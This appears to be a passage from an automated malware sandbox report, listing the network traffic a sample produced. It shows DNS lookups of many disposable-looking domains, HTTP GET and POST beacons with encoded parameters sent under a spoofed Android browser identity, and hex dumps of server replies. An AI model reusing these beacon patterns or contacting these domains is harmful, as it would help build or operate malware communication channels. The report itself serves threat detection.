            Source: global trafficHTTP traffic detected: GET /bk4m/?BHNhDJjp=9ev+IdmnT8REph2CGzrIJ/IsR1IBIoPEgwjA7hGEn4o4y1K06O5g5/jYrWQAF7mhR86KKy+6wQgfy24A0MXqjVprhsrq1Iq/McMaN4BLomsWsjrPI4172Mamgtp349unMg==&KteDo=fX0Hm8kxa HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.n-paylity.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ksch/?BHNhDJjp=J8lzQYDSDIyYjxmyisycdc0dQo+0mdR+IGXfAda7tEE7fn+2GVkWw6+hdf3A0BNElIx5K3urdoerlkCH3feHlz5JfFADuLqaJ1HoxSfDOrbKFf5fEpK5Atk4IzSpx3Ij7g==&KteDo=fX0Hm8kxa HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.supox.siteConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /886f/?KteDo=fX0Hm8kxa&BHNhDJjp=F4WdUfqIHBg/HL3skErP7lPVDvUzs0Cr8ZA+Fg9dI3ceouFLqqnQf6dPVZvR/nKMPYrd+0qk5jIF7ORmEYYYOZXDdPSYgHhA7DdWNhIxJ8KzsbpvOzugz6Mfni67awxMIw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.5711337.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.wcr5.top
            Source: global trafficDNS traffic detected: DNS query: www.syncsnode.net
            Source: global trafficDNS traffic detected: DNS query: www.facaicloud.top
            Source: global trafficDNS traffic detected: DNS query: www.nibcorp.xyz
            Source: global trafficDNS traffic detected: DNS query: www.93wxd.top
            Source: global trafficDNS traffic detected: DNS query: www.meramhaliyikama.xyz
            Source: global trafficDNS traffic detected: DNS query: www.n-paylity.shop
            Source: global trafficDNS traffic detected: DNS query: www.supox.site
            Source: global trafficDNS traffic detected: DNS query: www.5711337.xyz
            Source: global trafficDNS traffic detected: DNS query: www.master7.space
            Source: unknownHTTP traffic detected: POST /t97r/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.syncsnode.netOrigin: http://www.syncsnode.netReferer: http://www.syncsnode.net/t97r/Content-Length: 209Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36Data Raw: 42 48 4e 68 44 4a 6a 70 3d 53 57 53 63 79 41 44 42 63 4c 44 5a 64 36 65 66 2b 47 69 2f 43 4f 58 73 38 70 6c 4c 4a 44 50 48 33 35 34 4c 74 36 49 74 51 4f 34 66 69 49 30 6a 43 68 30 6f 4c 48 6c 38 4e 56 43 68 5a 6b 30 73 44 41 73 70 4d 32 62 43 48 6d 72 59 69 6f 67 72 6c 76 68 45 4a 73 44 50 51 66 56 51 52 54 4d 4d 71 4a 44 45 6c 48 4b 78 72 77 41 47 2b 52 71 41 6d 6c 6a 37 51 47 70 66 73 33 4d 79 59 66 67 4d 4e 59 56 49 63 4e 57 56 31 4e 34 30 37 72 57 6a 6b 44 6f 49 63 2f 49 55 49 39 66 6f 66 32 59 36 2f 37 62 33 71 36 6b 59 47 36 36 5a 68 43 4d 32 42 67 39 4f 33 6d 4b 6d 68 56 31 52 5a 58 53 31 68 4c 35 71 52 4b 77 3d Data Ascii: BHNhDJjp=SWScyADBcLDZd6ef+Gi/COXs8plLJDPH354Lt6ItQO4fiI0jCh0oLHl8NVChZk0sDAspM2bCHmrYiogrlvhEJsDPQfVQRTMMqJDElHKxrwAG+RqAmlj7QGpfs3MyYfgMNYVIcNWV1N407rWjkDoIc/IUI9fof2Y6/7b3q6kYG66ZhCM2Bg9O3mKmhV1RZXS1hL5qRKw=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Oct 2024 13:09:26 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a87b7e-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Oct 2024 13:09:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tkU0Iri%2FA2obOuL5Skx9aOk9wBsAH1jtOvgEAIjBWi7soU%2Fi%2BtlRT7NaQZ1CnwJWBUau9QgIDCljZeAtRLZCvSzkQmOtig76YHjToEeax4klazQzyNwseG6ssIRVyPw0nki0Xg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d0f1611b9478c7d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 32 64 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0 d9 e0 3e 51 a8 47 c5 55 91 e7 6f 93 f8 84 42 b6 ab e6 80 2c c0 8a 03 ee 93 49 e3 ec c8 73 02 3d 59 46 cb fb 64 d6 92 d5 5e e2 a4 7b 4c 97 cb 1a b4 d5 ac 85 49 43 2f 0c ee 8b 35 04 e5 b5 fd 91 32 a5 83 e6 bd a5 04 b2 76 d5 b0 66 83 2d 94 79 09 5f 88 e1 6f 3a 5a f9 db aa c9 2e f2 26 7b f0 df 91 3c 5f 23 ec c9 90 af e0 a6 2c cb 1a 0e c2 8f da 56 79 3d 90 e5 0a 2c f9 83 30 50 94 ee 94 6d 73 77 82 3f bd 16 66 0d 9f d0 4c c8 ba 17 6b 08 c2 86 34 a0 d7 43 0d cf 92 ad a1 13 fd 8f d1 c7 00 d2 ab 8b 61 18 ea 88 82 d4 d3 2b 7c c4 91 a9 86 83 b6 e9 0b 1b 49 0b 71 3c ff c0 78 e2 54 18 3d da 0a 7a b4 8c be 86 05 a3 ea 8f 3c 77 a7 6b 0a a9 c1 81 2b 48 cb 8b d0 51 d0 ac c9 56 a2 0b 64 8e 8c 35 30 b9 0a 6e a3 97 45 75 97 bf 8d b1 c1 c3 68 54 71 f5 f8 88 09 44 50 d2 a0 7f 62 55 ec 16 b3 46 5b 7c 8c f8 22 5a 74 e6 8b a8 23 23 eb a4 2d f3 b2 c9 54 11 e9 df be 34 9a c6 20 22 b0 f5 93 69 b8 8d f7 a4 7d c1 9f da b6 ab c6 b5 f7 0a c1 63 a0 a3 ef e3 e1 bf 23 06 46 09 3d 1d 8d 04 4b 0c 1d c2 10 ff 00 59 60 a5 03 04 f4 13 fa 37 4d e6 da 55 93 49 3d b5 0f eb 33 48 2f f4 dc 0c 79 9c 2f b2 dc ba 53 fd 90 fe c2 90 13 52 6a 3b 56 b1 14 62 98 70 3d d4 8f 00 7b 34 82 f5 84 75 6f 50 f8 aa 23 56 f5 13 a7 8f f6 96 cc d3 22 2f dc a9 fe a5 52 6e ca df e3 ac 3b f2 12 fd a2 0a 85 3b 41 20 a3 25 f8 b1 Data Ascii: 2d0dTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4Ca+|Iq<xT=z<wk+HQVd50nEuhTqDPbUF[|"Zt##-T4 "i}c#F=KY`7MUI=3H/y/SRj;Vbp={4uoP#V"/Rn;;A %
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Oct 2024 13:09:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uhcv0QSTuFkwz8VSce9PuNag8PzZG09W8PLiPGo2ELJ9BaqMNGec36dDVkH3WaXfMqYwzwhoKK68CvkXx5lOJMSEnt3feDXexfWyR09uIqZoyOVgYqM%2BRQEhPCjiofGJYnl3zQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d0f16219ca02394-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0 d9 e0 3e 51 a8 47 c5 55 91 e7 6f 93 f8 84 42 b6 ab e6 80 2c c0 8a 03 ee 93 49 e3 ec c8 73 02 3d 59 46 cb fb 64 d6 92 d5 5e e2 a4 7b 4c 97 cb 1a b4 d5 ac 85 49 43 2f 0c ee 8b 35 04 e5 b5 fd 91 32 a5 83 e6 bd a5 04 b2 76 d5 b0 66 83 2d 94 79 09 5f 88 e1 6f 3a 5a f9 db aa c9 2e f2 26 7b f0 df 91 3c 5f 23 ec c9 90 af e0 a6 2c cb 1a 0e c2 8f da 56 79 3d 90 e5 0a 2c f9 83 30 50 94 ee 94 6d 73 77 82 3f bd 16 66 0d 9f d0 4c c8 ba 17 6b 08 c2 86 34 a0 d7 43 0d cf 92 ad a1 13 fd 8f d1 c7 00 d2 ab 8b 61 18 ea 88 82 d4 d3 2b 7c c4 91 a9 86 83 b6 e9 0b 1b 49 0b 71 3c ff c0 78 e2 54 18 3d da 0a 7a b4 8c be 86 05 a3 ea 8f 3c 77 a7 6b 0a a9 c1 81 2b 48 cb 8b d0 51 d0 ac c9 56 a2 0b 64 8e 8c 35 30 b9 0a 6e a3 97 45 75 97 bf 8d b1 c1 c3 68 54 71 f5 f8 88 09 44 50 d2 a0 7f 62 55 ec 16 b3 46 5b 7c 8c f8 22 5a 74 e6 8b a8 23 23 eb a4 2d f3 b2 c9 54 11 e9 df be 34 9a c6 20 22 b0 f5 93 69 b8 8d f7 a4 7d c1 9f da b6 ab c6 b5 f7 0a c1 63 a0 a3 ef e3 e1 bf 23 06 46 09 3d 1d 8d 04 4b 0c 1d c2 10 ff 00 59 60 a5 03 04 f4 13 fa 37 4d e6 da 55 93 49 3d b5 0f eb 33 48 2f f4 dc 0c 79 9c 2f b2 dc ba 53 fd 90 fe c2 90 13 52 6a 3b 56 b1 14 62 98 70 3d d4 8f 00 7b 34 82 f5 84 75 6f 50 f8 aa 23 56 f5 13 a7 8f f6 96 cc d3 22 2f dc a9 fe a5 52 6e ca df e3 ac 3b f2 12 fd a2 0a 85 3b 41 20 a3 25 f8 b1 13 ef f2 f5 Data Ascii: 2c5dTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4Ca+|Iq<xT=z<wk+HQVd50nEuhTqDPbUF[|"Zt##-T4 "i}c#F=KY`7MUI=3H/y/SRj;Vbp={4uoP#V"/Rn;;A %
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Oct 2024 13:09:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ANaOv9XQTsyoFef80Srr98h8tnv5IEidnHrfJyXerFhjMAMr%2BGjWYXCuW2tcmwHSVVBFU2Hp%2B%2FXt60%2FjLOBmjae7J55Nx6c4yybP6iZAo%2BHl4MfOAZlnsG6VtaHQkvzdPD%2FSmw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d0f16317e2b0cc0-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0 d9 e0 3e 51 a8 47 c5 55 91 e7 6f 93 f8 84 42 b6 ab e6 80 2c c0 8a 03 ee 93 49 e3 ec c8 73 02 3d 59 46 cb fb 64 d6 92 d5 5e e2 a4 7b 4c 97 cb 1a b4 d5 ac 85 49 43 2f 0c ee 8b 35 04 e5 b5 fd 91 32 a5 83 e6 bd a5 04 b2 76 d5 b0 66 83 2d 94 79 09 5f 88 e1 6f 3a 5a f9 db aa c9 2e f2 26 7b f0 df 91 3c 5f 23 ec c9 90 af e0 a6 2c cb 1a 0e c2 8f da 56 79 3d 90 e5 0a 2c f9 83 30 50 94 ee 94 6d 73 77 82 3f bd 16 66 0d 9f d0 4c c8 ba 17 6b 08 c2 86 34 a0 d7 43 0d cf 92 ad a1 13 fd 8f d1 c7 00 d2 ab 8b 61 18 ea 88 82 d4 d3 2b 7c c4 91 a9 86 83 b6 e9 0b 1b 49 0b 71 3c ff c0 78 e2 54 18 3d da 0a 7a b4 8c be 86 05 a3 ea 8f 3c 77 a7 6b 0a a9 c1 81 2b 48 cb 8b d0 51 d0 ac c9 56 a2 0b 64 8e 8c 35 30 b9 0a 6e a3 97 45 75 97 bf 8d b1 c1 c3 68 54 71 f5 f8 88 09 44 50 d2 a0 7f 62 55 ec 16 b3 46 5b 7c 8c f8 22 5a 74 e6 8b a8 23 23 eb a4 2d f3 b2 c9 54 11 e9 df be 34 9a c6 20 22 b0 f5 93 69 b8 8d f7 a4 7d c1 9f da b6 ab c6 b5 f7 0a c1 63 a0 a3 ef e3 e1 bf 23 06 46 09 3d 1d 8d 04 4b 0c 1d c2 10 ff 00 59 60 a5 03 04 f4 13 fa 37 4d e6 da 55 93 49 3d b5 0f eb 33 48 2f f4 dc 0c 79 9c 2f b2 dc ba 53 fd 90 fe c2 90 13 52 6a 3b 56 b1 14 62 98 70 3d d4 8f 00 7b 34 82 f5 84 75 6f 50 f8 aa 23 56 f5 13 a7 8f f6 96 cc d3 22 2f dc a9 fe a5 52 6e ca df e3 ac 3b f2 12 fd a2 0a 85 3b Data Ascii: 2c5dTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4Ca+|Iq<xT=z<wk+HQVd50nEuhTqDPbUF[|"Zt##-T4 "i}c#F=KY`7MUI=3H/y/SRj;Vbp={4uoP#V"/Rn;;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 11 Oct 2024 13:09:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lal2CfZ5zm7NZgWlogiN555ysaYl6I77Px0eouK%2FlNhXpDJfybchTpxGH6c0s72ZcnH2fYn%2Bnq6LvptKDzJar2WBaiFqSc6GB3DUxZoVT4YdBY%2FN3xYfeg%2FOOT4Iv0H%2BJCS3yQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Speculation-Rules: "/cdn-cgi/speculation"Server: cloudflareCF-RAY: 8d0f1641c94318bc-EWRalt-svc: h3=":443"; ma=86400Data Raw: 34 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 Data Ascii: 4d6<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privatedate: Fri, 11 Oct 2024 13:09:57 GMTContent-Encoding: gzipData Raw: 32 35 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 54 c9 72 db 30 0c bd e7 2b 18 f6 90 8b 19 d9 69 ea c9 a8 92 7b e8 72 4c 3b 93 5e 7a a4 49 48 62 43 91 1a 92 de da e9 bf 97 4b 64 cb 96 ba e8 22 51 00 1e 1e 1e 40 14 d7 1f 3e bf ff fa ed cb 47 d4 b8 56 ae ae 8a f0 42 92 aa ba c4 a0 f0 ea 0a f9 a7 68 80 f2 f4 19 8f 2d 38 8a 58 43 8d 05 57 e2 8d ab c8 c3 8b e7 c9 ac 68 0b 25 de 0a d8 75 da 38 8c 98 56 0e 94 77 df 09 ee 9a 92 c3 56 30 20 f1 30 43 42 09 27 a8 24 96 51 09 e5 c2 83 c5 bc 11 cd 09 27 61 f5 a8 1d fa a4 37 8a 17 59 fa 31 f0 b8 26 c4 db 94 b3 88 90 01 4b 29 d4 33 32 20 4b cc 95 25 9d 81 0a 1c 6b 30 6a fc 57 89 b3 ac 0a 21 b7 b5 75 d4 09 76 cb 74 3b ac 21 06 27 cf c6 b9 ce e6 47 7f ad 6b 09 b4 13 36 84 64 cc da 77 15 6d 85 3c 94 8f 1b 5f 85 c6 29 a5 75 07 09 b6 01 70 67 c5 04 aa 4f d1 74 ce 35 ba 9f b8 87 c2 43 23 66 68 ad f9 01 fd 3c aa d1 ab b2 a6 ec b9 36 41 0f c2 b4 d4 26 47 af aa aa 7a 3b f2 eb 8d cb d7 cb f5 72 c2 1e 34 20 89 7f 8e 6e 52 05 37 33 64 a9 57 cc 82 11 7f 0a d9 81 a8 1b 97 a3 c5 7c 3e 4e da 9c 8c db 66 6c 6e a9 a9 85 ca d1 45 e4 af 53 47 43 95 b7 d5 46 4a 92 a0 26 04 f8 4b 8e 11 90 84 3d 61 7e f6 c0 4c 00 51 29 6a 45 84 83 d6 e6 28 79 8d 29 73 61 3b 49 0f 39 aa 3c d6 d8 fc 7d 63 9d a8 0e be 15 71 c6 a7 71 2e 69 75 da fa a1 d7 8a f8 71 9c e0 d5 9b f3 30 4f 7e 42 b7 70 9e f7 12 8e 69 0e 13 30 6b 6d 38 18 62 52 bb ee ba 3d b2 5a 0a 3e ae 21 4e 82 15 3f 20 47 77 cb 6e a2 c8 8e 72 2e 54 ed fb 86 16 6f 3c 4e 7a 8d 81 1c ec 1d 89 aa fe 9f 0e 2d 58 4b eb 29 ee 03 4a 8b 87 29 4a ff 4e d5 df 97 22 1b dc b0 22 3b ed b3 22 5c b0 c1 d2 e0 62 8b 98 a4 d6 96 38 f4 ba 9f 9b b3 66 0d 26 73 b0 32 e2 b2 1a 84 87 86 5c 98 83 cb fd fc be 27 15 23 32 1f 32 58 77 97 28 2f ea 60 14 f9 97 f8 d8 85 c5 dc 2b 32 81 7f 5c 94 13 59 fa 5f 2f 49 53 fe 24 80 d7 24 ee ff df e2 2a 2f 73 10 06 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 258Tr0+i{rL;^zIHbCKd"Q@>GVBh-8XCWh%u8VwV0 0CB'$Q'a7Y1&K)32 K%k0jW!uvt;!'Gk6dwm<_)upgOt5C#fh<6A&Gz;r4 nR73dW|>NflnESGCFJ&K=a~LQ)jE(y)sa;I9<}cqq.iuq0O~Bpi0km8bR=Z>!N? Gwnr.To<Nz-XK)J)JN"";"\b8f&s2\'#22Xw(/`+2\Y_/IS$$*/s0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privatedate: Fri, 11 Oct 2024 13:09:59 GMTContent-Encoding: gzipData Raw: 32 35 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 54 c9 72 db 30 0c bd e7 2b 18 f6 90 8b 19 d9 69 ea c9 a8 92 7b e8 72 4c 3b 93 5e 7a a4 49 48 62 43 91 1a 92 de da e9 bf 97 4b 64 cb 96 ba e8 22 51 00 1e 1e 1e 40 14 d7 1f 3e bf ff fa ed cb 47 d4 b8 56 ae ae 8a f0 42 92 aa ba c4 a0 f0 ea 0a f9 a7 68 80 f2 f4 19 8f 2d 38 8a 58 43 8d 05 57 e2 8d ab c8 c3 8b e7 c9 ac 68 0b 25 de 0a d8 75 da 38 8c 98 56 0e 94 77 df 09 ee 9a 92 c3 56 30 20 f1 30 43 42 09 27 a8 24 96 51 09 e5 c2 83 c5 bc 11 cd 09 27 61 f5 a8 1d fa a4 37 8a 17 59 fa 31 f0 b8 26 c4 db 94 b3 88 90 01 4b 29 d4 33 32 20 4b cc 95 25 9d 81 0a 1c 6b 30 6a fc 57 89 b3 ac 0a 21 b7 b5 75 d4 09 76 cb 74 3b ac 21 06 27 cf c6 b9 ce e6 47 7f ad 6b 09 b4 13 36 84 64 cc da 77 15 6d 85 3c 94 8f 1b 5f 85 c6 29 a5 75 07 09 b6 01 70 67 c5 04 aa 4f d1 74 ce 35 ba 9f b8 87 c2 43 23 66 68 ad f9 01 fd 3c aa d1 ab b2 a6 ec b9 36 41 0f c2 b4 d4 26 47 af aa aa 7a 3b f2 eb 8d cb d7 cb f5 72 c2 1e 34 20 89 7f 8e 6e 52 05 37 33 64 a9 57 cc 82 11 7f 0a d9 81 a8 1b 97 a3 c5 7c 3e 4e da 9c 8c db 66 6c 6e a9 a9 85 ca d1 45 e4 af 53 47 43 95 b7 d5 46 4a 92 a0 26 04 f8 4b 8e 11 90 84 3d 61 7e f6 c0 4c 00 51 29 6a 45 84 83 d6 e6 28 79 8d 29 73 61 3b 49 0f 39 aa 3c d6 d8 fc 7d 63 9d a8 0e be 15 71 c6 a7 71 2e 69 75 da fa a1 d7 8a f8 71 9c e0 d5 9b f3 30 4f 7e 42 b7 70 9e f7 12 8e 69 0e 13 30 6b 6d 38 18 62 52 bb ee ba 3d b2 5a 0a 3e ae 21 4e 82 15 3f 20 47 77 cb 6e a2 c8 8e 72 2e 54 ed fb 86 16 6f 3c 4e 7a 8d 81 1c ec 1d 89 aa fe 9f 0e 2d 58 4b eb 29 ee 03 4a 8b 87 29 4a ff 4e d5 df 97 22 1b dc b0 22 3b ed b3 22 5c b0 c1 d2 e0 62 8b 98 a4 d6 96 38 f4 ba 9f 9b b3 66 0d 26 73 b0 32 e2 b2 1a 84 87 86 5c 98 83 cb fd fc be 27 15 23 32 1f 32 58 77 97 28 2f ea 60 14 f9 97 f8 d8 85 c5 dc 2b 32 81 7f 5c 94 13 59 fa 5f 2f 49 53 fe 24 80 d7 24 ee ff df e2 2a 2f 73 10 06 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 258Tr0+i{rL;^zIHbCKd"Q@>GVBh-8XCWh%u8VwV0 0CB'$Q'a7Y1&K)32 K%k0jW!uvt;!'Gk6dwm<_)upgOt5C#fh<6A&Gz;r4 nR73dW|>NflnESGCFJ&K=a~LQ)jE(y)sa;I9<}cqq.iuq0O~Bpi0km8bR=Z>!N? Gwnr.To<Nz-XK)J)JN"";"\b8f&s2\'#22Xw(/`+2\Y_/IS$$*/s0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privatedate: Fri, 11 Oct 2024 13:10:02 GMTContent-Encoding: gzipData Raw: 32 35 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 54 c9 72 db 30 0c bd e7 2b 18 f6 90 8b 19 d9 69 ea c9 a8 92 7b e8 72 4c 3b 93 5e 7a a4 49 48 62 43 91 1a 92 de da e9 bf 97 4b 64 cb 96 ba e8 22 51 00 1e 1e 1e 40 14 d7 1f 3e bf ff fa ed cb 47 d4 b8 56 ae ae 8a f0 42 92 aa ba c4 a0 f0 ea 0a f9 a7 68 80 f2 f4 19 8f 2d 38 8a 58 43 8d 05 57 e2 8d ab c8 c3 8b e7 c9 ac 68 0b 25 de 0a d8 75 da 38 8c 98 56 0e 94 77 df 09 ee 9a 92 c3 56 30 20 f1 30 43 42 09 27 a8 24 96 51 09 e5 c2 83 c5 bc 11 cd 09 27 61 f5 a8 1d fa a4 37 8a 17 59 fa 31 f0 b8 26 c4 db 94 b3 88 90 01 4b 29 d4 33 32 20 4b cc 95 25 9d 81 0a 1c 6b 30 6a fc 57 89 b3 ac 0a 21 b7 b5 75 d4 09 76 cb 74 3b ac 21 06 27 